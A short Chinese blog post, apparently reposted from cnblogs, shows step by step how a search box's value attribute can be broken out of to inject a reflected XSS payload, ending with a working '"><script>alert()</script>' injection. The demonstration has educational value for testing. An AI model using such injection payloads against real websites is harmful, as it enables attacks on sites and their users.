标签:
<input id="productName" name="productName" class="search_text" type="text" onfocus="javascript:jq(this).val(‘‘);" value="111"/>
<input id="productName" name="productName" class="search_text" type="text" onfocus="javascript:jq(this).val(‘‘);" value="111‘</a"/>
可以看到111前面有个" 在/a后面还有” 这个是系统自动加的,然后系统自动增加了 />
<input id="productName" name="productName" class="search_text" type="text" onfocus="javascript:jq(this).val(‘‘);" value="111><script>alert(‘a‘)</script>"/>
可以看到在</script>之后自动添加了"/>
<input id="productName" name="productName" class="search_text" type="text" onfocus="javascript:jq(this).val(‘‘);" value="111"><script>alert(‘a‘)</script>"/>
此时前面该闭合的都已经闭合了,最后留下了xss代码执行成功,会弹出一个对话框,内容为“a”
标签:
原文地址:http://www.cnblogs.com/luyg24/p/4284954.html